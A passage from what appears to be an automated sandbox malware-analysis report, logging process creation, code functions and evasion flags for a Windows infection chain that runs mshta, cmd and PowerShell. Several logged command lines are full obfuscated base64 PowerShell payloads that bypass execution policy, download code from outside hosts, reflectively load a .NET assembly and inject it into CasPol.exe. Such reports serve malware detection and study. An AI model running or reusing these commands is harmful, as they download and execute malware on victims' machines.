0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_047C42D2 push ebx; ret 3_2_047C42DA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_047C12A0 push ss; iretd 3_2_047C12AF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1724F push ecx; iretd 8_2_02E1725A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1B209 push esi; iretd 8_2_02E1B216
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E18340 push edx; iretd 8_2_02E1834E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1B14D push esi; iretd 8_2_02E1B14E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1864D push ecx; iretd 8_2_02E1864E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1B615 push ecx; iretd 8_2_02E1B616
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E18725 push esp; iretd 8_2_02E18726
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E19704 push esi; iretd 8_2_02E19706
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1870D push esp; iretd 8_2_02E1870E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E184A0 push ecx; iretd 8_2_02E1854E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E18450 push edx; iretd 8_2_02E1849E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E195AD push esi; iretd 8_2_02E195AE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E18540 push ebx; iretd 8_2_02E185A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1AF35 push esi; iretd 8_2_02E1AF37
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1CDC4 push esp; iretd 8_2_02E1CDD1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02E1CDD3 push esp; iretd 8_2_02E1D1D5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567E0 push eax; ret 12_2_004567FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
